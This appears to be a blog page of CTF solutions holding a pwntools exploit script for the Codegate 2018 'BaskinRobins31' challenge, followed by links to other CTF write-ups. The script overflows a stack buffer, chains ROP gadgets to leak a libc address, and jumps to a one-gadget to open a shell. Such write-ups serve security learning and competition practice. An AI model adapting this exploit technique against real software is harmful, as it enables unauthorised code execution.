# exploit.py
from pwn import *
from time import *
p = process('./BaskinRobins31')
#p = remote('ch41l3ng3s.codegate.kr', 3131)
sleep(0.3)
print p.recv(1024)
payload = str('3') + 'A'*183
payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0)
payload += p64(0x4008a4)
p.sendline(payload)
data = p.recv(1024)
read = u64(data[237:245])
libc = read - 0xf7250
oneshot = libc + 0x45216
log.info('read = ' + hex(read))
log.info('libc = ' + hex(libc))
log.info('oneshot = ' + hex(oneshot))
r_payload = 'A'*184
r_payload += p64(oneshot)
p.sendline(r_payload)
p.interactive()
'ctf' 카테고리의 다른 글
| [Codegate 2018 CTF] Super Marimo (0) | 2018.02.08 |
|---|---|
| [Codegate 2018 CTF] RedVelvet (0) | 2018.02.08 |
| [BKP 2016 CTF] cookbook (0) | 2017.06.01 |
| [HUST 2017 CTF] pwnable writeup (0) | 2017.06.01 |
| [DEFCON 2017 CTF] beatmeonthedl (0) | 2017.05.09 |
